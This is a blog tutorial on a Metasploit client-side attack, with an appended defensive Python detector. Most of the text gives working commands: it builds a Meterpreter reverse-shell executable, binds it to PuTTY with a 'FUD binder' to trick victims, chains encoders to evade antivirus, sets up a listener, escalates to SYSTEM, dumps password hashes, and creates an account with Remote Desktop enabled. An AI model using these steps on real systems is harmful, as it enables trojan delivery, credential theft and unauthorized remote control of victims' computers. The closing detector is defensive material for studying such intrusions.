Monday, October 31, 2011

Metasploit Framework tutorial - part 4 (Client Side attack)

In this tutorial I will show a basic Metasploit client-side attack. In our case I will send a payload bound to an executable file to the victim. If the victim opens the file, the payload is executed and gives us a back connection to our Meterpreter listener.

Type cd /pentest/exploits/framework in your terminal.

This navigates to Metasploit's folder. OK, to generate a payload, type the command:

msfpayload windows/meterpreter/reverse_tcp LHOST=your-wan-ip LPORT=4444 x > /root/payload.exe

To get your WAN IP address just go to

windows/meterpreter/reverse_tcp is the payload we are going to use; it gives us a TCP Meterpreter session on execution.

Now you can see an executable file in your root folder named "payload.exe". Now we have to send this executable to the victim.
In our case I'm using a FUD binder to bind the payload with another executable file (I'm using PuTTY, an SSH client) to fool the victim and to evade antivirus.

You can use any FUD binder or crypter, but make sure you don't corrupt the file.
Or you can even use Metasploit's inbuilt encoder, known as "msfencode". If you wish to use that, then your command will be:

msfpayload windows/meterpreter/reverse_tcp LHOST=your-wan-ip LPORT=4444 R | ruby msfencode -t exe -e x86/shikata_ga_nai > /root/payload.exe

But that is detected by AVs. Well, you can even chain multiple encoders, like this:

msfpayload windows/meterpreter/reverse_tcp LHOST=your-wan-ip LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e x86/fnstenv_mov -c 5 -t raw | msfencode -e x86/call4_dword_xor -c 4 -t raw | msfencode -e x86/countdown -c 4 -t raw | msfencode -e x86/shikata_ga_nai -c 16 -t exe > /root/msfpayload.exe

This is still detected by a few AVs, or you can try different combinations; to see the list of available encoders type "msfencode -h". If it doesn't work, try hex editing after encoding.

OK, before sending the file to the victim we need to set up a listener to receive the Meterpreter session when the victim executes the file. For that, open up msfconsole. Since we are in the Metasploit folder, just type

./msfconsole
and then type

use exploit/multi/handler

For the payload, type

set PAYLOAD windows/meterpreter/reverse_tcp

This time for LHOST use your LAN IP; type "ifconfig" in another terminal to find the LAN IP.
So the commands will be like:

set LHOST your-lan-ip

set LPORT 4444

OK, done. Now type

exploit

That's it; now our listener will listen for any incoming connections on port 4444.

Don't forget to port-forward port "4444" on the router to your "LAN IP".
After port forwarding, check your port using this website

OK, now our victim has executed putty.exe (the program bound to my payload). Within seconds our listener will give us a Meterpreter session. That's it, we own the system now.

Now a simple hack using Meterpreter: we will create a user account and enable Remote Desktop on the victim's system.
Type "help" to see the full list of commands and their descriptions.
Type these commands to get SYSTEM:

use priv


to check your privilege


To dump hashes type "hashdump". Just play around with all the commands.

OK, now we will enable Remote Desktop on the victim's computer. For that, type

run getgui -u username -p password

Now open up a new terminal and type the command:

rdesktop -u username -p password victim's-ip

If you wish to delete the user accounts after using RDP,

After you are done with it, type "exit" to exit the session.

OK, for those trying to test this within VirtualBox: make sure you have a VPN installed (like Hotspot Shield) in the Windows box, and remember for LHOST use your WAN IP for the payload and your LAN IP for the listener. Very important: port-forward your router to BackTrack's LAN IP on port 4444.
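From the defender's side, as an added example that is not part of the original tutorial: a small Python detector that flags the pattern this walkthrough leaves on the victim host, an outbound connection from a program to an unexpected port on an external address, followed by account creation and Remote Desktop being enabled (fDenyTSConnections set to 0) by the same process. The telemetry lines, the event format and the expected-port baseline are all constructed for the example.

```python
import ipaddress
from datetime import datetime, timedelta

# Constructed endpoint telemetry (not from the original post): one event per
# line as "timestamp|event|image|key=value;...". It covers the tutorial's chain:
# bound putty.exe calls back to port 4444, then getgui adds a user and enables RDP.
SAMPLE_EVENTS = """\
2011-10-31T10:00:01|netconn|putty.exe|dst=203.0.113.10:4444
2011-10-31T10:00:05|netconn|putty.exe|dst=192.168.1.20:22
2011-10-31T10:00:40|user_created|putty.exe|name=support
2011-10-31T10:00:41|registry|putty.exe|name=fDenyTSConnections;value=0
2011-10-31T10:05:00|netconn|firefox.exe|dst=198.51.100.5:443
2011-10-31T11:30:00|user_created|lusrmgr.exe|name=alice
"""
# Assumed baseline: ports each program is expected to use. Any other port on a
# non-RFC1918 address is treated as a possible reverse-shell callback.
EXPECTED_PORTS = {"putty.exe": {22, 23}, "firefox.exe": {80, 443}}
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
FOLLOW_UP_WINDOW = timedelta(minutes=10)


def parse(text):
    events = []
    for line in text.strip().splitlines():
        ts, kind, image, detail = line.split("|", 3)
        fields = dict(kv.split("=", 1) for kv in detail.split(";"))
        events.append((datetime.fromisoformat(ts), kind, image, fields))
    return events


def is_external(host):
    return not any(ipaddress.ip_address(host) in net for net in INTERNAL)


def detect(events):
    """Alert on unexpected outbound connections, then on account creation or
    RDP enablement by the same process within FOLLOW_UP_WINDOW of that call."""
    alerts, callbacks = [], {}
    for ts, kind, image, f in events:
        if kind == "netconn":
            host, port = f["dst"].rsplit(":", 1)
            if is_external(host) and int(port) not in EXPECTED_PORTS.get(image, set()):
                alerts.append(f"callback {image} -> {host}:{port}")
                callbacks[image] = ts  # remember when this process phoned home
        elif image in callbacks and ts - callbacks[image] <= FOLLOW_UP_WINDOW:
            if kind == "user_created":
                alerts.append(f"post-callback account {f['name']} by {image}")
            elif kind == "registry" and f.get("name") == "fDenyTSConnections" and f.get("value") == "0":
                alerts.append(f"post-callback RDP enabled by {image}")
    return alerts
```

Running detect(parse(SAMPLE_EVENTS)) yields three alerts for putty.exe and nothing for the legitimate firefox.exe connection or the unrelated account created by lusrmgr.exe.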

That's it, a basic client-side exploitation.
Thanks for reading my tutorial!
